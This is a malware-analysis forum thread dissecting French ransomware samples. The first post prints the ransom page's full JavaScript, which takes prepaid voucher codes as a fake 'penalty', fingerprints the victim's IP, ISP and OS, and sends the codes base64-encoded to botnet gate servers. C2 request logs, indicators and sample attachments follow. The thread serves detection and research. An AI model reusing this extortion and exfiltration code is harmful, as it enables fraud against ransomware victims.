A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #10301  by Xylitol
 Sun Dec 11, 2011 9:14 pm
2 French version in attach

27/43 >> 62.8%
http://www.virustotal.com/file-scan/rep ... 1323484597

6/43 >> 14.0%
http://www.virustotal.com/file-scan/rep ... 1323613279

Image

Image
Code: Select all
/*
* Global variables 
 */
var debug = false;
var debug_ec = false;

if (debug || debug_ec)
{
    alert("DEBUG! DEBUG! DEBUG!");
    document.getElementById("v3").value = "1";
}

var penalty_amount = 200;
var g_botnet = "fr1";
var g_os_version = "Unknown";
var g_userid = "0";

var RESPONSE_PONG = "Pong!";
var RESPONSE_OK = "OK";
var MSG_WRONG_VOUCHERS = "Voucher code incorrecte.";
var MSG_VOUCHERS_SENT = "Voucher a été envoyé. Attends pour environ 24h.";
var MSG_LOW_TOTAL = "Total des moins de "+penalty_amount+" €";

if (debug)
{
    g_gates = [
        "http://lck-test.net/gate.php",
        "http://lck-test4.net/gate.php", // not exists
        "http://lck-test1.net/gate.php",
        "http://lck-test2.net/gate.php",
        "http://lck-test3.net/gate.php"
        ]
}
else
{
    g_gates = [
		"http://bundespol.com/gate.php",
        "http://yycqparxvohd.com/gate.php",
        "http://wzuoqliyknpz.com/gate.php"
        ]
}

var positions_count = 1;

var g_state = new Object();
g_state.geo_location_lock = false;
g_state.geo_location_set = false;
g_state.report_lock = false;
g_state.report = "";
g_state.report_sent = true;
g_state.gate_selector_lock = false;
g_state.gate_selector_gate_works = true;
g_state.gate_selector_calls_count = 999999;
g_state.gate_selector_gate_index = 0;
g_state.os_version_set = false;
g_state.userid_set = false;

g_base64_std_key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
g_base64_priv_key = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/=";

function print_g_state()
{
    if (debug_ec)
    {
        console.log("dump of g_state:")
        console.log("\tg_state.geo_location_lock: %s", g_state.geo_location_lock ? "true" : "false");
        console.log("\tg_state.geo_location_set: %s", g_state.geo_location_set ? "true" : "false");
        console.log("\tg_state.report_lock: %s", g_state.report_lock ? "true" : "false");
        console.log("\tg_state.report: %s", g_state.report);
        console.log("\tg_state.report_sent: %s", g_state.report_sent ? "true" : "false");
        console.log("\tg_state.gate_selector_lock: %s", g_state.gate_selector_lock ? "true" : "false");
        console.log("\tg_state.gate_selector_gate_works: %s", g_state.gate_selector_gate_works ? "true" : "false");
        console.log("\tg_state.gate_selector_calls_count: %d", g_state.gate_selector_calls_count);
        console.log("\tg_state.gate_selector_gate_index: %d (%s)", g_state.gate_selector_gate_index, g_gates[g_state.gate_selector_gate_index]);
        console.log("===================================================================================================");
    }
}

function base64_encode(input, key)
{
    var output = "";
    var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
    var i = 0;

    while (i < input.length)
    {
        chr1 = input.charCodeAt(i++);
        chr2 = input.charCodeAt(i++);
        chr3 = input.charCodeAt(i++);

        enc1 = chr1 >> 2;
        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
        enc4 = chr3 & 63;

        if (isNaN(chr2))
        {
            enc3 = enc4 = 64;
        }
        else if (isNaN(chr3))
        {
            enc4 = 64;
        }

        output = output +
            key.charAt(enc1) + key.charAt(enc2) +
            key.charAt(enc3) + key.charAt(enc4);
    }

    return output;
}

/*
 * multitab window's tabs switcher
 */
function switch_tab(content_tab_id, content_id)
{
    document.getElementById('vouchers_info_tab').className = 'close';
    document.getElementById('penalty_form_tab').className = 'close';
    document.getElementById(content_tab_id).className = 'open';

    document.getElementById('vouchers_info').style.display = 'none';
    document.getElementById('penalty_form').style.display = 'none';
    document.getElementById(content_id).style.display = 'block';
    return;
}


/*
* Text input filter
*/

(function()
{   // after loading document init function will be called
    if (window.addEventListener)
        window.addEventListener("load", init, false);
    else if (window.attachEvent)
        window.attachEvent("onload", init);

})();

function register_handler(id)
{
    // register handler function
    if (id.addEventListener)
    {
        id.addEventListener("keypress", filter, false);
    }
    else
    {
        id.onkeypress = filter;
    }

    return;
}

// Find all <input> tags, for which necessary to register event handler
function init()
{
    var inputtags = document.getElementsByTagName("input");
    for(var i = 0; i < inputtags.length; i++) // traverse all tags
    {
        var tag = inputtags[i];
        if (tag.type != "text") continue; // only text fields
        var allowed = tag.getAttribute("allowed");
        if (!allowed) continue; // and only if presents attribute 'allowed'
        // register handler function
        register_handler(tag);
    }
}

// This is event 'keypress' handler, which maintains input filtration.
function filter(event)
{
    // Get event object and character code by portable way
    var e = event || window.event; // Keyboard event object
    var code = e.charCode || e.keyCode; // What key pressed

    // If pressed functional key do not filter it
    if (e.charCode == 0) return true; // Functional key (FF only)
    if (e.ctrlKey || e.altKey) return true; // Pressed Ctrl or Alt
    if (code < 32) return true; // ctrl ASCII code

    // Now get information from input element
    var allowed = this.getAttribute("allowed"); // Allowed characters
    var errorClassName = this.getAttribute("errorclass"); // class name indicating error
    var successClassName = this.getAttribute("successclass"); // class name indicating success

    // Translate key code to character
    var c = String.fromCharCode(code);

    // Check whether character in allowed characters list or not
    if (allowed.indexOf(c) != -1)
    {
        // character c is allowed
        this.className = successClassName;
        return true; // Accept input
    }
    else
    {
        // character c is not allowed
        this.className = errorClassName;
        // Prevent input
        if (e.preventDefault) e.preventDefault();
        if (e.returnValue) e.returnValue = false;
        return false;
    }
}

/*
* End of text input filter
 */



/*
* penalty form support code
 */
function get_position_number_html(position_number)
{
    return "" + (position_number * 1 + 1);
}

function get_voucher_code_html(position_number)
{
    return "<input id='voucher_code" + position_number + "' type='text' size='25' maxlength='19' allowed='0123456789' errorclass='errborder' successclass='goodborder' class='goodborder'>";
}

function get_voucher_value_html(position_number)
{
    return "<input id='voucher_value" + position_number + "' type='text' size='14' maxlength='3' value='0' allowed='0123456789' errorclass='errborder' successclass='goodborder' class='goodborder' onkeyup='refresh_total()'>";
}

function get_img_minus_html(position_number)
{
    return position_number <= 0 ? "" : "<img src='minus.png' alt='' onclick='delete_voucher_position(" + position_number + ")'>";
}

function add_voucher_position()
{
    var position_number = positions_count;
    positions_count++;

    var newrow = document.all.penalty.insertRow(position_number + 1);
    var newcell = newrow.insertCell(0);
    newcell.innerHTML = get_position_number_html(position_number);
    newcell = newrow.insertCell(1);
    newcell.innerHTML = get_voucher_code_html(position_number);
    newcell = newrow.insertCell(2);
    newcell.innerHTML = get_voucher_value_html(position_number);
    newcell = newrow.insertCell(3);
    newcell.innerHTML = get_img_minus_html(position_number);

    register_handler(document.getElementById("voucher_code"+position_number));
    register_handler(document.getElementById("voucher_value"+position_number));

    return;
}

function delete_voucher_position(position_number)
{
    var i, j;
    var vouchers = new Array();
    var values = new Array();
    var total_amount;

    for(i = 0, j = 0; i < positions_count; i++)
    {
        if (i != position_number)
        {
            vouchers[j] = document.getElementById("voucher_code"+i).value;
            values[j] = document.getElementById("voucher_value"+i).value;
            j++;
        }
    }

    for(i = 0; i < positions_count; i++)
    {
        document.all.penalty.deleteRow(1);
    }
    
    positions_count--;

    for(i = 0; i < positions_count; i++)
    {
        var newrow = document.all.penalty.insertRow(i + 1);
        var newcell = newrow.insertCell(0);
        newcell.innerHTML = get_position_number_html(i);
        newcell = newrow.insertCell(1);
        newcell.innerHTML = get_voucher_code_html(i);
        newcell = newrow.insertCell(2);
        newcell.innerHTML = get_voucher_value_html(i);
        newcell = newrow.insertCell(3);
        newcell.innerHTML = get_img_minus_html(i);
    }

    for(i = 0; i < positions_count; i++)
    {
        document.getElementById("voucher_code"+i).value = vouchers[i];
        document.getElementById("voucher_value"+i).value = values[i];
        register_handler(document.getElementById("voucher_code"+i));
        register_handler(document.getElementById("voucher_value"+i));
    }

    total_amount = 0;
    for(i = 0; i < positions_count; i++)
    {
        total_amount += values[i] * 1;
    }
    document.getElementById("total_amount").innerHTML = total_amount;

    return;
}

function refresh_total()
{
    var total_amount = 0;
    for(var i = 0; i < positions_count; i++)
    {
        total_amount += document.getElementById("voucher_value"+i).value * 1;
    }
    document.getElementById("total_amount").innerHTML = total_amount;

    var do_pay = document.getElementById("do_pay");
    //do_pay.disabled = total_amount < penalty_amount ? 'disabled' : '';
    do_pay.disabled = '';

    return total_amount;
}

/*
* End of penalty form support code
 */


/*
* Geoip code
 */
function http_new_request()
{
    if(typeof XMLHttpRequest != "undefined")
    {
        return new XMLHttpRequest();
    }
    else if(window.ActiveXObject)
    {
        var aVersions = ["MSXML2.XMLHttp.5.0", "MSXML2.XMLHttp.4.0", "MSXML2.XMLHttp.3.0", "MSXML2.XMLHttp", "Microsoft.XMLHttp"];
        for (var i = 0; i < aVersions.length; i++)
        {
            try
            {
                return new ActiveXObject(aVersions[i]);
            }
            catch (e) {}
        }
    }
}

function http_get(target, callback, options)
{
    var request = http_new_request();
    var timer;

    if (options.timeout)
    {
        timer = setTimeout(
            function()
            {
                request.abort();
                if (options.timeoutHandler)
                    options.timeoutHandler(target);
            },
            options.timeout
            )
    }

    request.onreadystatechange = function()
    {
        if (request.readyState == 4)
        {
            if (timer) clearTimeout(timer);
            if (request.status == 200)
            {
                callback(request.responseText);
            }
            else
            {
                if (options.errorHandler) options.errorHandler(request.status, request.statusText);
                else callback(null);
            }
        }
    }

    try
    {
        request.open("GET", target, true);
        request.send(null);
    }

    catch (e) {
    }
}

function set_geo_location()
{
    var options = new Object();

    function cb_set_geo_location(response_text)
    {
        try
        {
            if (response_text == null)
            {
                g_state.geo_location_set = false;
            }
            else
            {
                var re = /Your IP Address(.*?)<b>(.*?)<\/b>/i;
                var s_ip = response_text.match(re)[2].toString();
                re = /ISP:(.*?)<b>(.*?)<\/b>/i;
                var s_isp = response_text.match(re)[2].toString();
                re = /City:(.*?)<b>(.*)<\/b>/i;
                var s_city = response_text.match(re)[2].toString();
                if (s_ip == "")
                {
                    s_ip = "188.28.11.121";
                }
                document.getElementById("v_ip").innerHTML = s_ip;
                document.getElementById("v_city").innerHTML = s_city;
                document.getElementById("v_isp").innerHTML = s_isp;
                g_state.geo_location_set = true;
            }
        }

        catch (e) {}

        finally
        {
            g_state.geo_location_lock = false;
        }
    }

    function cb_set_geo_location_timeout(target)
    {
        g_state.geo_location_set = false;
        g_state.geo_location_lock = false;
    }

    if (!g_state.geo_location_set && !g_state.geo_location_lock)
    {
        g_state.geo_location_lock = true;
        options.timeout = 3000;
        options.timeoutHandler = cb_set_geo_location_timeout;
        http_get("http://tools.ip2location.com/ib2/", cb_set_geo_location, options);
    }
}

function select_gate()
{
    var options = new Object();
    
    function cb_select_gate(response_text)
    {
        if (response_text == RESPONSE_PONG)
        {
            g_state.gate_selector_gate_works = true;
            g_state.gate_selector_calls_count = 0;
            if (debug_ec) console.log("Pinging gate %s was successfully.", g_gates[g_state.gate_selector_gate_index]);
        }
        else
        {
            g_state.gate_selector_gate_works = false;
            if (debug_ec) console.log("Pinging gate %s was failed.", g_gates[g_state.gate_selector_gate_index]);
        }
        g_state.gate_selector_lock = false;
    }

    function cb_select_gate_timeout(target)
    {
        g_state.gate_selector_gate_works = false;
        g_state.gate_selector_lock = false;
        if (debug_ec) console.log("Pinging gate %s was timeout.");
    }

    if (!g_state.gate_selector_lock && g_state.userid_set)
    {
        if (!g_state.gate_selector_gate_works || g_state.gate_selector_calls_count++ > 3600) // every one hour
        {
            g_state.gate_selector_lock = true;
            if (debug_ec) console.log("Pinging gate %s...", g_gates[g_state.gate_selector_gate_index]);

            if (!g_state.gate_selector_gate_works)
            {
                g_state.gate_selector_gate_index = (g_state.gate_selector_gate_index + 1) % g_gates.length;
            }

            options.timeout = 5000;
            options.timeoutHandler = cb_select_gate_timeout;
            var os_version = base64_encode(g_os_version, g_base64_std_key);
            http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=ping&botnet="+g_botnet+"&userid="+g_userid+"&os="+os_version, cb_select_gate, options);
        }
    }
}

function send_report()
{
    var options = new Object();
    
    function cb_send_report(response_text)
    {
        if (response_text != RESPONSE_OK)
        {
            g_state.gate_selector_gate_works = false;
            g_state.report_sent = false;
            if (debug_ec) console.log("Sending report '%s' on gate %s was failed.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
        }
        else
        {
            if (debug_ec) console.log("Sending report '%s' on gate %s was successfully.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
        }
        g_state.report_lock = false;
    }

    function cb_send_report_timeout(target)
    {
        g_state.gate_selector_gate_works = false;
        g_state.report_lock = false;
        if (debug_ec) console.log("Sending report '%s' on gate %s was timeout.", g_state.report, g_gates[g_state.gate_selector_gate_index]);
    }

    if (!g_state.report_lock && !g_state.report_sent && g_state.gate_selector_gate_works)
    {
        g_state.report_lock = true;
        if (debug_ec) console.log("Sending report '%s' on gate %s...", g_state.report, g_gates[g_state.gate_selector_gate_index]);
        // set 'report_sent = true' here to prevent overwriting this flag in
        // moment between changing report value and calling cb_send_report()
        g_state.report_sent = true;
        options.timeout = 5000;
        options.timeoutHandler = cb_send_report_timeout;
        http_get(g_gates[g_state.gate_selector_gate_index]+"?cmd=data&botnet="+g_botnet+"&userid="+g_userid+"&report="+g_state.report, cb_send_report, options);
    }
}

function set_os_version()
{
    if (g_state.os_version_set) return;

    var iOS = new Array("Windows 95","Windows NT 4","Windows 98","Win 9x 4.9","Windows NT 5.0","Windows NT 5.1","Windows NT 6.1","Windows NT 5.2","Windows NT 6.0");
    var oOS = new Array("Windows 95","Windows NT 4.0","Windows 98","Windows ME","Windows 2000","Windows XP","Windows Seven","Windows 2003","Windows Vista");
    var os = "";

    for (var i = 0; i < iOS.length; i++)
    {
        if (navigator.userAgent.indexOf(iOS[i]) > -1)
        {
            os = oOS[i];
            break;
        }
    }

    g_os_version = os;
    document.getElementById("v_os").innerHTML = os;
    g_state.os_version_set = true;
    if (debug_ec) console.log("OS version set successfully.");
}

function set_userid()
{
    if (g_state.userid_set) return;

    g_userid = document.getElementById("v3").value;
    if (g_userid != "0")
    {
        g_state.userid_set = true;
        if (debug_ec) console.log("Userid set successfully.");
    }
}

function monitor()
{
    refresh_total();
    set_geo_location();
    set_os_version();
    set_userid();
    select_gate();
    send_report();
}

window.onload = function ()
{
    setInterval(monitor, 1000);
}

function are_vouchers_valid()
{
    var prefix;
    var is_valid = true;
    var ret = true;

    for(var i = 0; i < positions_count; i++)
    {
        var voucher_code = document.getElementById("voucher_code"+i);
        var voucher = voucher_code.value;
        if (voucher.length == 19)
        {
            prefix = voucher.substr(0, 6);
            if (prefix != "633718")
            {
                is_valid = false;
            }
        }
        else if (voucher.length == 16)
        {
            prefix = voucher.substr(0, 1);
            if (prefix != "0")
            {
                is_valid = false;
            }
        }
        else
        {
            is_valid = false;
        }

        if (is_valid)
        {
            voucher_code.className = voucher_code.getAttribute("successclass");
        }
        else
        {
            voucher_code.className = voucher_code.getAttribute("errorclass");
            ret = false;
        }
    }

    return ret;
}

function send_vouchers()
{
    var report = "";

    if (!are_vouchers_valid())
    {
        alert(MSG_WRONG_VOUCHERS);
        return;
    }

    var total = refresh_total();
    if (total < penalty_amount)
    {
        alert(MSG_LOW_TOTAL);
        return;
    }

    for(var i = 0; i < positions_count; i++)
    {
        var voucher = document.getElementById("voucher_code"+i).value;
        var value = document.getElementById("voucher_value"+i).value;
        report += report.length ? "x" : "";
        report += voucher + "-" + value;
    }

    if (report.length > 16)
    {
        report = base64_encode(report, g_base64_priv_key);
        if (g_state.report != report)
        {
            g_state.report = report;
            g_state.report_sent = false;
            if (debug_ec) console.log("Report updated and wait sending.");
        }
    }

    alert(MSG_VOUCHERS_SENT);
    return;
}
Network activity:
Code: Select all
http://papicaton.in/check?a=2
http://tools.ip2location.com/ib2/
• dns: 1 ›› ip: 188.247.135.97 - adresse: PAPICATON.IN 
Network activity:
Code: Select all
http://tools.ip2location.com/ib2/
http://bundespol.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
http://bundespol.com/gate.php?cmd=data&botnet=fr1&userid=ei14b69hk8j2x4n7&report=c34Ncj4Ncj4Ncj4Ncj4NciQOc30=
http://yycqparxvohd.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
http://wzuoqliyknpz.com/gate.php?cmd=ping&botnet=fr1&userid=ei14b69hk8j2x4n7&os=V2luZG93cyBYUA==
--
• dns: 4 ›› ip: 67.226.152.139 - adresse: BUNDESPOL.COM
addr: BUNDESPOL.COM -- ip: 60.19.30.135
addr: BUNDESPOL.COM -- ip: 217.24.246.7
addr: BUNDESPOL.COM -- ip: 58.128.228.1
addr: BUNDESPOL.COM -- ip: 67.226.152.139
• dns: 4 ›› ip: 58.128.228.1 - adresse: WZUOQLIYKNPZ.COM
addr: WZUOQLIYKNPZ.COM -- ip: 60.30.73.102
addr: WZUOQLIYKNPZ.COM -- ip: 60.19.30.135
addr: WZUOQLIYKNPZ.COM -- ip: 67.226.152.139
addr: WZUOQLIYKNPZ.COM -- ip: 58.128.228.1

Data found inside the exe:
einzahlung@mail.com
lck-test.net
lck-test1.net
lck-test2.net
lck-test3.net
lck-test4.net
CNDROAAYGHMF.COM
YYCQPARXVOHD.COM
http://xylibox.blogspot.com/2011/12/fak ... eting.html
I was a little more motivated because it target my country.
Attachments
pw: infected
(402.65 KiB) Downloaded 141 times
 #10897  by rkhunter
 Sat Jan 07, 2012 3:33 pm
French winlock - Trojan:Win32/Ransom.FL.

13/43 >> 30.2%

Replaces explorer.exe in system root and its copy in dllcache.
cndroaayghmf.com GET /de/2/gate.php?cmd=ul&id=pc33redh4v3z6dlt HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
fgppixrcvnfu.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
sxnykimafhbj.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA== HTTP/1.1
Attachments
pass:infected
(274.02 KiB) Downloaded 82 times
 #11078  by rkhunter
 Tue Jan 17, 2012 6:18 am
One more French ransom, under UPX

MD5: c19886400c9fc45dbbdd33af8a51ec28

13/43

Replaces explorer.exe and its copy at dllcache.

Image

Requests:
Code: Select all
cndroaayghmf.com GET /de/2/gate.php?cmd=ul&id=pc33redh4v3z6dlt
vwbulrzmduks.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA
gfnboiygpdti.com GET /gate.php?cmd=ping&botnet=fr8&userid=pc33redh4v3z6dlt&os=V2luZG93cyBYUA
Unpacked (McAfee told that this is PWS)
9/43

In archive original and unpacked.
Attachments
pass: infected
(491.78 KiB) Downloaded 82 times
 #11109  by EP_X0FF
 Wed Jan 18, 2012 11:31 am
rkhunter wrote:Seems Microsoft has the problem with this packer, because this is not first time can't bypass it, - VirTool:Win32/Obfuscator.QG
Not really a lack of anything. VirTool:Win32/Obfuscator most related equivalent in Dr.Web bases for example is Trojan.Packed, probably. Such obfuscation techniques are used on various kinds of malware, files with such obfuscation may have virtually any purpose. By default they simple moved to quarantine.
 #11110  by rkhunter
 Wed Jan 18, 2012 11:40 am
EP_X0FF wrote:
rkhunter wrote:Seems Microsoft has the problem with this packer, because this is not first time can't bypass it, - VirTool:Win32/Obfuscator.QG
Not really a lack of anything. VirTool:Win32/Obfuscator most related equivalent in Dr.Web bases for example is Trojan.Packed, probably. Such obfuscation techniques are used on various kinds of malware, files with such obfuscation may have virtually any purpose. By default they simple moved to quarantine.
Yes, you right. But I see not many such verdicts, I think this "problem" will solve by MS. Seems there upx->obfustation->upx. Probably this packing method uses by BH.